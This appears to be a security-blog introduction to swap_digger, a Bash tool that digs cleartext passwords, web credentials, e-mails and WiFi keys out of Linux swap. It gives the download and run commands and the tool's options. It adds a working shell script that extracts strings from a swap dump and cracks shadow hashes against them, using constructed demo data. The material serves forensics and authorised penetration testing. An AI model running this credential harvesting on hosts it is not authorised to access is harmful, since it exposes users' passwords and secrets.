Swap Digger: a tool that automatically extracts and searches for Linux user credentials
Today's tool is Swap Digger. It automates searching a Linux system's swap space for user credentials, web form credentials, e-mail addresses from web forms, HTTP authentication data, WiFi SSIDs and keys, and similar secrets that were paged out of memory.
swap_digger is a Bash script that automates the extraction and analysis of data from a target Linux system's swap. It serves two audiences: forensic analysts, who can point it at a swap dump or a mounted image, and penetration testers, who can use it on a compromised host during post-exploitation to recover cleartext passwords. In every mode it needs root, because it reads the swap device and /etc/shadow.
Downloading and running the tool
On the local host (analysing the machine's own swap), open a terminal and run the following to download and execute the swap_digger script:
alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -v
For a mounted hard drive (forensic analysis of a disk image or an external drive), first download the script:
alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
Next, locate the target's swap file or partition:
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -S
Finally, analyse the target. -r must point at the root of the mounted target file system (it has to contain etc/shadow, since that is where the script reads the hashes it tests candidates against) and -s at the target's swap device or swap dump:
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx -r path/to/mounted/target/root/fs -s path/to/target/swap/device
On a third-party machine (penetration tests and CTFs), fetch and run the single script directly:
alice@1nvuln3r4bl3:~$ wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.sh
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx
Simple run
If all you need is to recover the cleartext passwords of local Linux users, run the script with no options:
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh
Available options
./swap_digger.sh [ OPTIONS ]

Options:
    -x, --extended          Run extended tests on the target swap to retrieve other interesting data
                            (web passwords, emails, wifi creds, most accessed urls, etc.)
    -g, --guessing          Try to guess potential passwords based on observations and stats.
                            Warning: this option is not reliable; it may dig up more passwords
                            as well as hundreds of false positives.
    -h, --help              Display this help.
    -v, --verbose           Verbose mode.
    -l, --log               Log all outputs in a log file (protected inside the generated working directory).
    -c, --clean             Automatically erase the generated working directory at end of script
                            (will also remove the log file).
    -r PATH, --root-path=PATH
                            Location of the target file-system root (default value is /).
                            Change this value for forensic analysis when the target is a mounted
                            file system. This option has to be used along with the -s option to
                            indicate the path to the swap device.
    -s PATH, --swap-path=PATH
                            Location of the swap device or swap dump to analyse.
                            Use this option for forensic/remote analysis of a swap dump or a
                            mounted external swap partition. This option should be used with the
                            -r option, where at least /<root-path>/etc/shadow exists.
    -S, --swap-search       Search for all available swap devices (use for forensics).
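To make the two procedures above concrete (finding swap with -S and then the default run that tests swap contents against /etc/shadow, plus the -x style extraction of e-mail addresses and URLs), here is an added example in POSIX sh. It is not swap_digger's own code; it re-implements the idea on constructed data. The /proc/swaps table, the swap dump, the shadow entry and the planted password 'Sup3rS3cret!' are all made up for the demo, and the salted re-hashing uses openssl passwd -6 (OpenSSL 1.1.1 or later) as an assumption, since the page does not show the real script's matching logic.

```shell
#!/bin/sh
# Added example, not swap_digger's code. Re-implements the idea behind the
# default run and the -x extended tests on constructed data; the real script
# reads /proc/swaps, the swap device and /etc/shadow as root.
export LC_ALL=C   # byte-oriented tr/sort so bytes > 0x7f count as non-printable

# 1. Enumerate swap devices as -S would: first column of a /proc/swaps table.
#    $1 is a /proc/swaps-style file (defaults to the real /proc/swaps).
list_swap_devices() {
    awk 'NR > 1 && NF >= 1 { print $1 }' "${1:-/proc/swaps}"
}

# 2. Turn a raw swap dump into password candidates: keep runs of printable
#    characters, then drop strings that are too short or too long to be a
#    password. tr(1) is used instead of strings(1) to stay POSIX-only.
extract_candidates() {
    tr -c '[:print:]\n' '\n' < "$1" \
        | awk 'length($0) >= 6 && length($0) <= 64' \
        | sort -u
}

# 3. Extended tests (-x): pull e-mail addresses and URLs out of the same dump.
extract_emails() {
    tr -c '[:print:]\n' '\n' < "$1" \
        | grep -Eo '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' | sort -u
}
extract_urls() {
    tr -c '[:print:]\n' '\n' < "$1" \
        | grep -Eo 'https?://[A-Za-z0-9./_?=&%-]+' | sort -u
}

# 4. Test every candidate in file $2 against one shadow line $1
#    (user:$6$salt$hash:...). Each candidate is re-hashed with the entry's own
#    salt via openssl passwd -6 (assumed available, OpenSSL >= 1.1.1) and
#    compared to the stored hash. Prints "user:password" on a hit and returns 0;
#    returns 1 when nothing matches and 2 for hash types this demo does not handle.
check_shadow_line() {
    line=$1; cands=$2
    user=$(printf '%s' "$line" | cut -d: -f1)
    hash=$(printf '%s' "$line" | cut -d: -f2)
    case $hash in
        '$6$'*) ;;            # SHA-512-crypt only
        *) return 2 ;;
    esac
    salt=$(printf '%s' "$hash" | cut -d'$' -f3)
    while IFS= read -r cand; do
        if [ "$(openssl passwd -6 -salt "$salt" "$cand" 2>/dev/null)" = "$hash" ]; then
            printf '%s:%s\n' "$user" "$cand"
            return 0
        fi
    done < "$cands"
    return 1
}

# --- Demo on constructed data (no root needed) -------------------------------
work=$(mktemp -d)
# Constructed /proc/swaps table with a partition and a swap file.
printf 'Filename\t\t\t\tType\t\tSize\tUsed\tPriority\n' > "$work/swaps"
printf '/dev/sda2\t\t\t\tpartition\t4194300\t0\t-2\n' >> "$work/swaps"
printf '/swapfile\t\t\t\tfile\t\t1048572\t0\t-3\n' >> "$work/swaps"
# Constructed swap dump: non-printable bytes around a paged-out password,
# an e-mail address and a visited URL (the kind of residue swap_digger hunts for).
printf '\377\376\001\002Sup3rS3cret!\001\002\003alice@example.com\377\377https://intranet.example.com/login\001\376' \
    > "$work/swap.dump"

echo "[*] swap devices:";  list_swap_devices "$work/swaps"
extract_candidates "$work/swap.dump" > "$work/cands"
echo "[*] candidates:";    cat "$work/cands"
echo "[*] emails:";        extract_emails "$work/swap.dump"
echo "[*] urls:";          extract_urls "$work/swap.dump"
# Constructed shadow entry for user alice, hashed from the planted password so
# the demo stays self-consistent; skipped if openssl lacks SHA-512-crypt support.
if shadow_hash=$(openssl passwd -6 -salt abcdefgh 'Sup3rS3cret!' 2>/dev/null) && [ -n "$shadow_hash" ]; then
    echo "[*] cracked:";   check_shadow_line "alice:$shadow_hash:19000:0:99999:7:::" "$work/cands"
fi
rm -rf "$work"
```

The length filter is the same trade-off the real tool makes: it keeps the noise down, but anything shorter than six characters never becomes a candidate, and the salted re-hash of every surviving string is what makes a run on a large swap slow.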